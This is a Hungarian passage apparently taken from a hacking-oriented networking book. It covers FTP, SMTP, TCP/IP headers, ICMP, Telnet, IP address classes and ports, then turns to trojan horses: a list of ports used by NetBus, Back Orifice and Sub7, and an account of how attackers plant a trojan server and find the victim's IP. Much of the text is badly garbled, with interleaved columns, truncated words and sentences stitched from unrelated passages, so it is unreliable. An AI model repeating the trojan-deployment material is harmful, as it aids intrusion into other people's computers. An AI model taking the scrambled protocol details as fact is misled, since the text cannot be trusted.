átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

s ez igazolja az átvitel tökéletességét. amely nagyon nagy ásokat igényelne. • Az adatfolyamok priorizálása. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. ent egy számítógép. • Optimalizált adatfolyam . Ha egyszer még elő az adatátvitelben. hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. amelyet eredetileg a SUN fejleszYellow Pages volt a neve). vagyis az adatfolyam prioritá küldése. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. Az átmenetekkel nem volt könnyű megbirkózni.Windowing-nak is nevezik. egy multikomputerré olvadnak össze. így a különböző számítótni. am egyidejű átvitelére lehet használni. A címzett minden fogadott csomagról egy ü feladónak. Ebben a hibael funkciói segítenek. A transzport rétegben két protokoll található. ha több különböző kapacitású szádelkezésre. így nayes konvertereket kellett alkalmazni. • Ellenőrzés. és olyan feladatot kell elvégezni. A pontosabb felépítésébe itt nem megyünk bele. A TCP az egyik fő protokoll. is át lehet küldeni vele. elszavak központi adminisztrációját. gondoskodva arról. domain a NIS-adatbázisban leképezett számítógépek csoportja. kompatibilitási ek fel. de nem változtatni ezeket. Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni. hanem a legkülönbözőbb adattípusoka. audió stb. lehetővé teszi a decentralizált userID-k.as években más mail-rendszereket is bevezettek. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják. a már említ UDP (User Datagram Protocol). amely már nem ak a tiszta szövegküldésre. ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére. Ez a rendszer. amely a szervertől kap adatokat. .

53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. verzióra. azonban közeledik a váltás a 6. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. Az interneten pillanatnyilag m használják.s felügyeli. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. Ebből látszik. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. illetve a szerverhez olódni. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. Az UDP ezt a. Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős. illetve a TCP-vel. a csomagot részcso bolják. miszerint biztonságos átviteli protokoll. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele. a TCP-re bízhatja a kapét. Totál Lenght: az adatcsomag teljes hossza bájtban (max. az adatok hosszáról. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról. az lefagyaszthatja a PC-t. amelyek aktíva az adatok átvitelében. azás. kis táblázat példákat mutat arra. mint a TCP. ot egy három részből álló folyamat vezeti be. és közli a UDP-header adatainak az t. amelyet néh zatban (LAN) már használnak. amellyel a távoli számítógéphez. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. Ugyanúgy biztosítatlan. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. megnyitása után mindkét irányba áramolhatnak az adatok. Ezek és a két következő mező vezérlik a reassembly-t (ld . Az ok. ehhez persze még más fontos protokollokra is szükség van. Type of Service: minden bitnek csak ajánlókaraktere van. Hogy ezt elkerüljék. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. A f azt jelenti. mondhatni. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. amelyről később. és a kapcsolat felépül. Az UDP azonban nem kéri a fogadás megerősítehát. mint például az Internet Explorer. nszportréteg alatti rétegek tartalmaznak. hogy milyen szolgáltatások érP-vel. egy alkalmazáscsatoló-felület az IP-hez. Ezt nevezik p lásnak (Buffer Owerflow). A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. hogy a TCP teljes felel a hírének. hogy nem lépett-e fel súlyos hiba az adatátvitelben. amelyet three-wayneveznek. a DoS-támadásokró ben többet mondunk. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. Hálózati réteg Ez a réteg különböző protokollokat fog össze. En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. megerősítéssel válaszol. amely a TCP-nél említett tulajdonságok dicsekedhet. például: Internet Protocol (IP) ő számítógép. mint azok a protokollok. tud adatokat továbbítani az alkalmazásoknak.

minden továbbinál egy fragmezőjének a hosszával növekszik az érték. logikai c tárolni. Tehát a logikai címet a fizikai címre kell cserél az ARP. amelyek nem támogatják a álást. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. Ekkor a következő router már nem veszi fel. az lamikor el lesz távolítva a hálózatról. Itt van feljegyezve a küldő száme. lően kell alakítani az ellenőrzőszámot.bitnek a következő a jelentése: gment: olyan hostokhoz. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. Sok kódot kiegészítésekhez terveztek. címből állítaná elő a fizikait. a firmware á niált fizikai címe. Ezáltal teljesül a 1 6 bites ás. Mivel az időmérés meglematikus a hálózatban. és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. A legfontosabbak: • Record Route: naplózza az adatcsomag útját. és kiosztja a fragAz első fragmentum offset O-t kap. Ez egy headerből és az ARP-csomagból áll. meg kell delt ULP (Upper Layer Protocol) protokollt. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. hogy egy adatcsomag minden umát fogadta-e. amelyet például az interneten talál meghajtó egymagában nem képes arra. A RARP az ARP-vel ellenkező irányban működik. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. • Padding: kitöltő bitek. hogy tékre csökkenjen. mivel semmilyen módon nem áll összeköttetés hardvercímével. amelyben tartós. az internetprotokoll igazán komplex. Ennek az értéknek a dja a címzett megállapítani. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. Routolási hibánál. Mivel a különböző protokollok az IP-re támaszkodnak. Offset: egy adatcsomag adatbájtjait számozza. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. Options: opcionális mező további információknak. Mint látjuk. de mindez az adatok átvitelét szolgálja. például huroknál. ress: a forrásállomás internetcíme. Itt van feljegyezve a fogadó címe. Ahelyett. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be. és ezért mindig csak a fizikai cím ismeretével bootolnak . hogy hiányoznak-e töredékek. hogy bináris null re egészítse ki a frame-et. A számítógépes kommunikációhoz azonban n nem logikai címet használnak. hogy a logikai címén számítógépet. A padding feladata. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. és egy RARP-választ küldenek vissza. Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. • gments: hogy kiderüljön. Address: a célállomás internetcíme.

5. 12. 11. 10. . ehhez a Telnet egy terminált szimulál (szöveg. például a hibaüzenetek közvetítése. mintha maga is egy fölérendelt protokoll lenne. Váltsunk vissza a Telnet-re. Sőt. 5 Paraméter Problem: Paraméter-probléma. Ez ugyanaz a folya FTP-nél. és az adatok visszajönnek a számítógépre. 3. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. Kattintsunk a Kapcsolatra. mindkét irányra kiterjedő. http://www. és készen áll. hogy távoli s jelentkezzenek be az interneten. ány alkalmazás és protokoll használata és ztonságosságuk 9. a Telnet elindul. lejjebb). Megjelenik egy pá 7. Kattintsunk az OK-ra. a Telneten keresztül programokat is el lehet rendszereken. az internetfejles kafeljegyzése. Most a szerver a jelszót akarja tudni. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek. n megfelelően módosul. 8 bit/bájt-orie kációs lehetőséget nyújtani. Beírjuk a következőket: • Hostnév: meine-domain. A Telnet tehát lehetővé teszi a felhasználóknak. Ez az a név. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. A szokásos módon tárcsázzunk be a szolgáltatónkhoz.1 A Telnet aüzenetekről. amelyet az FTPlunk (ld. Ugyanaz IP-t. a szerver üdvözöl. Kattintsunk a Hálózati rendszer kapcsolatra. Ezután nyomjuk le az Enter-t. Most megjelenik: Welcome. A Telnetet az RFC 854 (Request for Comment. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. 3.exe sort. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1.org/) a következőképpen defini protokoll célja egy általános. 11 Time exceeded: a timer puffer-erőforrások elhasználva. Gépeljük be a telnet. eírás cho reply 8 Time est 16 17 6. és parancsokat hajtassanak végre mítógépeken. 4 -elterelés.ontrol Message Protocol (ICMP) eladata az üzenetek. 2.3.ietf. 4.de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. azonban kotórésze. Adjuk meg a login-nevünket.

pl. Az FTP biztonsága Az FTP nem túl biztonságos protokoll. akkor a szerver hibakóddal válaszol. Bár az FTP-t egy vetlenül is lehet használni. tehát akárhányszor m a jelszót. hogy minden adatot kódolatlan szövegként visz át. Az FTP-t az for Comments. és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. . FTP ávoli rendszerek közötti adatátvitel egyik módszere. pcsolatban vagyunk a szerverrel. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. s különbözőképpen tá a legfontosabb támadási formák. szervereknél ki lehet találni az érvényes login-neveket. adatátvitel egy FTP kliensen keresztül történik. FTP-szervernek. 2. Mivel a Telnet felhasználóazonosítást kíván (loginnév. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. amit írunk. porton keresztül teszi fel. mivel a szabvá cióban nincs korlátozás a jelszavak beírására. elsősorban programokon keresztüli hasznáék. Egy kapcsolat létrehozásához. a jelszó beírása ható.rtassuk magunkat. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van. A parancssort lehet látni. ubis2$. Ha valak login-nevet ad meg. 3. lehet írni a parancsokat. biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. A CuteFTP felülete e még egyszer az Enter-t. ha beleolvas a omba. amiért nem látjuk. illetve FTP da futnia a célszámítógépen. b3$ stb. adatok megbízható és hatékony átvitele. Ezt a támadást Brute Force-rohamnak is nevezik. Az A fontos szolgáltatás az interneten. ilyen például a y a WS_FTP. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. nagyon könnyen megszerezheti a fiókadatokat. egy betolakodó. jelszó). mert általa a programok vagy a d minden internet-felhasználó számára elérhetők.

A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna. A beszélgetésekhez ma már kliens valamelyikét használják. irc. az IP-címmel érhető el.ffing TP kódolatlan szövegként továbbítja az adatokat. Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. A legismertebbek közé tartoznak hC és a pIRCh. eltöltés jelszófájlt. a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik. többnyire a p írásmódot használják. szervertől függően (IRC szerver. a trójaiaknál). felhasználók. Az IP-címek archikus. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). hogy egy ügyfél a szolgáltatójától kapja ges IP-címet.3. pl. a bb csatornákon (channels) lehetnek.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. IRC-felület A címzés az interneten az IP-címzésen alapul. amelynél a 32 bit 8 bitekre van felosztva. . Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re.net).euirc. felhasználói adatok birtokába juthat. mális számként írják le.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4. Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál. blokkokban kölcsönzik IP-címeiket. 3. miközben a hálózatok üzemeltetői időbeli kül. Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek. A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik. ahol mindig szívesen küldenek t rusokat (ld. íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni. Többrésztvevős valós idejű konferenciákat tesz lehetővé. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is. De az IRC-parancsokból is sok információt tudhat me felhasználóról. amelyeket a chat-en mondott nekik ajtsanak. Erről a óló fejezetben további részleteket tudhatnak meg. trójai). az IP Numbering Autho pában a RIPE (http://www. Az interneten rás egy egyértelmű számmal. ha egy betörő lózati forgalmakba. Leginkább az újoncok vehogy bizonyos parancsokat.ripe. ami azt jelenti.

bbb. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1. és a maradék 16 bitet adhatják ki maguk (ez 254-ig.x. C-osztályú hálózatokon 255.x. Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig. TCP/IP viss Ez az A-osztályú há hurokként szolgál. és a második negyedben van a 0-255-ig ékterület.x.x. mivel a szabad számkészlet mindig kisebb lesz. Így jöttek létre a hálózati osza. Már ma is szűkösen megy a B.x-ig 240. amelyre információk tudnak bejön menni. gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül).és C.x. ezér magyarázat következik. Az A-osztályú hálózatokat azonban mára már mind kiosztották. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek. amely a 90-es évek elején átvette az elését.x239.168.255-ig routolni.0 és x. Néhány ilyen csatolófelületet biztosan minden felhasznál . a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig). A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad.x. szegmens észen kiosztva kapják.ccc.x. az InterNIC-től függetlenül. önállóan a hozzájuk utalt címtartományokat.bbb. belüli IP-címeket csak az intraneten b Az 1.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak. 192.x255. aaa. internetre kapcsolódó intra-00192. Ezért van be állni. mert más célokat 3. x. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x.x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni. egyetlen x. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet.bbb.31. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre).x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki. 224. amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van.x. és tok tulajdonosainak az első három szegmenst (aaa.x gépei számára van fenntartva.x internetre kapcsolódó intranet helyi gépei számára van fenntartva.x.168. ntesítés céljából az InterNIC. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten.x.x.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét.ti osztályok kiderült. 10. 172.x.4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával. amelyet a szolgáltatók nem oszthatnak ki.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím. amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni. a 255 a negyed 127.x. amelyek.x. az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át. A C- címek kiadása.x.x.x.x.x).x-i intraneten belül lehet routolni. amelynek ez az első szegmense. amely a további szövegek jobb megértésé A port egy csatolófelület. az Ipv6 IP-címzési rendszer.16.

Az 1-1023-ig portok a standard. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t.ik például az egér és a billentyűzet mint adatbeviteli eszközök. désre vár. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket. s a megfelelő szolgramhibáira építenek. E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. a Unixnak és a BeOs-nak is. ez a port tehát nyitott. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. hanem erportokról van szó. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3). . így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80.de) -. kkor nyitott. Ezeket a portokat számokkal jelölik. de rendszerint mindenki használhatja őket. illetve rossz szándékú támadások agy fogadhatók. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek. számú portjával. Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt. A nagyobb portokat dinamikus vagy privát portoknak nevezik. Itt azonban nem fizikai. a 25. A manipulált adatdéséhez általában adott portokat használnak. A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza.ilyen például a 7tf Sphere (www. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www.iana. 5536 port van. illetve statikus Well known portok. után a monitor vagy a nyomtató jelenti. tehát vannak a Linuxnak. és gyakran bizonyos szervizekhez vezve. ha egy program ezen a porton egy kérésre (request). ok/ról/on káros adatcsomagok. ezeket más aját készítésűek is. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez.org/assignments/ numbers weboldalon található.hackerzbook. akkor ez porton vár kérdésre. használhatják. Ezért ajánlatos a rendszer gyakori vizsgálata egy el . Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. Ha egy FTP szervert telepítünk a rendszerre. portszámról megy. kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. t portok az 1024-49151 portok. Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz. és az portok lezárása egy tűzfallal.

secure. Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www. .un. ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait.A portokat a trójaiak is használják.de címen kapunk pontos listát.

3.5 A runonce.6.3.2.5. és vezérli a szervert 4.6.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4.1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4.1 A szerver kiosztása 4.6.2.Hálózati eszköz vagy támadás a Microsoft ellen 4.5 4.3.2 Álcázás a WinZip-pel 4. fejezet .6.4 4.exe-vel a C:\ meghajtóra 4.3 Windows-Registry ez már izgalmas 4. Miből 4.4.5 A lemezek majdnem ugyanígy működnek 4.1 Támad a Sub7 BackOrifice 2K .2 A kliens otthon marad.3 A trójaiakat az ICQ-val is tovább lehet adni 4.3.3 Így álcázzák és terjesztik a trójaiakat 4.1 4.Tartalom 4.4.2.egy trójai rémisztő lehetőségekkel 4.1 A trójaiakat fájlokba integrálják 4.és trójai-szkenner 4.1 Vírus.6.2 A történelmi minta.3 Hogyan szerzik meg a hackerek az IP-t? 4.6 További terjesztési stratégiák 4.exe kicserélése áll egy trójai? .3.4 Elég egy CD és az automatikus lejátszás funkció 4.4 Módszerek az Explorer.6 Sub7 .3.2 AutoRun bejegyzések 4.3.

Hogy a trójai eltitkolja az elhelyezését. Ezután a görögök visszahúzódtak. amelybe meg nem engedett kódot ágyaztak . álcázást használ. mégis mérhetetlen károkat okozhat. Ez a tipikus feladata egy keylogger-nek. De lehet egy olyan program is. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása. és önfeledten ünnepeltek.mint program aktív. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol.A trójaiak 4. 4. Trójainak tehát egy szoftvert nevezünk. Mindig valami váratlant tesz.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs. hogy miből is áll egy trójai. Jóval komplexebbek azok a programok. ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. Úgy képzelhető el. akárcsak a görög katonák. hogy el is indítsa a szervert.2 Miből áll egy trójai? Először is tudni kell. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. Amikor látták. A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét. az kiderül a továbbiakban a különböző trójai programok leírásából.2. ha a szerver . amely a város közelében rejtőzött. Az elérés csak akkor jöhet létre. A trójai lehet egy hasznos program. amely információkat közvetít úgy.tehát az eredeti program megváltoztatása. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni. amely lehetővé teszi az idegen számítógép „távirányítását". Erre a görögök évekig ostromolták eredménytelenül Trója városát. 4. illetve áldozat PC-re. és kinyitották a város kapuit a görög seregnek. Különböző műveleteket hajt végre. ként működik. és Trója kapuja elé állíttatta.ilyenkor a program a trójai program hordozója- . a trójai király megszöktette a szépséges görög Helénát. amely egy fájlba naplózza felhasználói beviteleket. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz. de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. vagyis egy keyboard logfájlt készít. De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg. Építtetett egy hatalmas falovat. A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. hogy egy számítógép vagy annak az adatai elérhetővé váljanak. A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. amely valami hasznosat vagy csak valami érdekeset csinál. Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül . Hogy az akciók lehetőségei milyenek lehetnek. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. azaz „rá kell sózni".1 A szerver kiosztása Ahhoz. hanem a számítógép távirányítását is lehetővé teszik. amely látszólag hasznos funkciókat hajt végre. hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál. amelyről azt sem tudjuk. telepíteni kell a szervert a cél-. akik azután éjszaka kimásztak a ló hasából. A szerver a központi program. a trójaiak isteni jelképét. hogy a számítógépünkre került. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program. amelyek nemcsak adatokat küldenek el. amelyekről a fertőzött rendszer felhasználója mit sem tud. Trója elesett . Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. hogy ostrommal nem tudják bevenni.a hackerek pedig a magukévá tették a trójai faló ötletét. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé. * A felhasználót rá kell venni arra. a görög Odüsszeusznak támadt egy ötlete.

az a felhasznált szoftvertől függ. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. illetve az internetre lép. amelyeket a kliens el tud indítani. A kapcsolat könnyen felismerhető 4. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . a támadónak egy vezérlőprogramra is szüksége van. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot. módosította a main()-funkcókat. Hogy hogyan használja ki ezt a veszélyes potenciált. Ez így nagyon egyszerűen hangzik. az a támadótól függ. válogatás nélkül címeket szkennelni. A komplex trójai programok. Szerencsére a programozás nagyon hibás volt. így nem keletkeztek jelentősebb károk. Az akciók lehetnek viszonylag ártalmatlanok. a szerverfájl mindjárt el is indul. amellyel egy új felhasználót jegyzett be. választják. az IP-keresés viszonylag egyszerű. Csak ezután lehet célzottan megszólítani. aki ezzel elérést kapott. hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. dinamikus IP-címet kap. ha 